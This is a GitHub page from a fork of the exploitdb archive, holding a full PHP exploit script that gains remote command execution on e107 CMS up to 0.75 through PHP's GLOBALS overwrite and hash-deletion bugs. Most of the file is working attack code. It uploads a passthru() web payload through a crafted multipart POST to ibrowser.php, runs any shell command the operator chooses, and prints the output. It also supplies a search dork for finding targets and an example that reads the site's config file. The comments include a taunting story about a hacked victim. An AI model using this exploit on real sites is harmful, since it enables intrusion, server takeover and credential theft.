forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy path26443.php
More file actions
executable file
·196 lines (179 loc) · 8.19 KB
/
Copy path26443.php
File metadata and controls
executable file
·196 lines (179 loc) · 8.19 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
source: http://www.securityfocus.com/bid/15250/info
PHP is prone to a vulnerability that allows attackers to overwrite the GLOBAL variable via HTTP POST requests.
By exploiting this issue, remote attackers may be able to overwrite the GLOBAL variable. This may allow attackers to further exploit latent vulnerabilities in PHP scripts.
#!/usr/bin/php -q -d short_open_tag=on
<?
print_r(
--------------------------------------------------------------------------------
e107 <= 0.75 GLOBALS[] overwrite/Zend_Hash_Del_Key_Or_Index remote commands
execution exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "This site is powered by e107"|inurl:e107_plugins|e107_handlers|e107_files
--------------------------------------------------------------------------------
');
/*
works with register_globals=On
against PHP < 4.4.1, 5 < PHP < 5.0.6
*/
if ($argc<4) {
print_r(
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path cmd OPTIONS
host: target server (ip/hostname)
path: path to e107
cmd: a shell command
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /e107/ ls -la -P1.1.1.1:80
php '.$argv[0].' localhost /e107/ cat ./../../../../e107_config.php -p81
--------------------------------------------------------------------------------
');
die;
}
/*
software site: http://e107.org/
vulnerable code in class2.php near lines 29-37:
...
// Destroy! (if we need to)
if($register_globals == true){
while (list($global) = each($GLOBALS)) {
if (!preg_match('/^(_POST|_GET|_COOKIE|_SERVER|_FILES|GLOBALS|HTTP.*|_REQUEST|retrieve_prefs|eplug_admin)$/', $global)) {
unset($$global); [**]
}
}
unset($global);
}
...
and in e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php near lines 26-40:
...
require_once("../../../../class2.php");
if (!defined('e107_INIT')) { exit; }
unset($tinyMCE_imglib_include); //[*]
// include image library config settings
include 'config.php';
$request_uri = urldecode(empty($HTTP_POST_VARS['request_uri'])?(empty($HTTP_GET_VARS['request_uri'])?'':$HTTP_GET_VARS['request_uri']):$HTTP_POST_VARS['request_uri']);
// if set include file specified in $tinyMCE_imglib_include
if (!empty($tinyMCE_imglib_include))
{
include $tinyMCE_imglib_include; ///[***]
}
...
you can evade [*] by sending the hash keys of $tinyMCE_imglib_include var and
[**] (this *should* unsets the hash keys...) by sending a multipart/form-data
request with the "GLOBALS" var
here [***] the code will include the temporary file and execute our shellcode
see http://www.hardened-php.net/hphp/zend_hash_del_key_or_index_vulnerability.html
and http://www.hardened-php.net/advisory_202005.79.html
for details about this php vulnerabilities
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$cmd="";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data="-----------------------------7d529a1d23092a\r\n"; #oh, I want to tell you a story, about a Telecom guy *
$data.="Content-Disposition: form-data; name=\"tinyMCE_imglib_include\"; filename=\"suntzu\";\r\n"; #that doesn't know *
$data.="Content-Type: image/jpeg;\r\n\r\n"; #the sovereign art of PHP kung-fu, now is desperate and he's seriously *
$data.="<?php error_reporting(0);set_time_limit(0);echo 'my_delim';passthru('".$cmd."');echo 'my_delim'; die;?>\r\n";# *
$data.="-----------------------------7d529a1d23092a\r\n"; #thinking to kill himself, after he loosed his work *
$data.="Content-Disposition: form-data; name=\"-1203709508\"; filename=\"suntzu\";\r\n";//and his honour and self-respect*
$data.="Content-Type: image/jpeg;\r\n\r\n"; //because of some brave guys that rooted his boxes.*
$data.="1\r\n";# *
$data.="-----------------------------7d529a1d23092a\r\n"; #Now, guy, don't cry anymore, but... do something *
$data.="Content-Disposition: form-data; name=\"225672436\"; filename=\"suntzu\";\r\n"; #useful, please open the PHP *
$data.="Content-Type: image/jpeg;\r\n\r\n"; #manual, like a respectful student. And start to... *
$data.="1\r\n";# *
$data.="-----------------------------7d529a1d23092a\r\n";# *
$data.="Content-Disposition: form-data; name=\"GLOBALS\"; filename=\"suntzu\";\r\n";# *
$data.="Content-Type: image/jpeg;\r\n\r\n";# *
$data.="1\r\n";# *
$data.="-----------------------------7d529a1d23092a--\r\n";# *
$packet ="POST ".$p."e107_handlers/tiny_mce/plugins/ibrowser/ibrowser.php HTTP/1.0\r\n";# *
$packet.="Host: ".$host."\r\n";# *
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";# *
$packet.="Content-Length: ".strlen($data)."\r\n";# *
$packet.="Accept: text/plain\r\n";# *
$packet.="Connection: Close\r\n\r\n";# *
$packet.=$data;# *
sendpacketii($packet);# *
if (strstr($html,"my_delim")){# *
echo "exploit succeeded...\n";$temp=explode("my_delim",$html);die($temp[1]); #...pray *
}
echo "exploit failed... register_globals=off here or wrong PHP version\n";
?>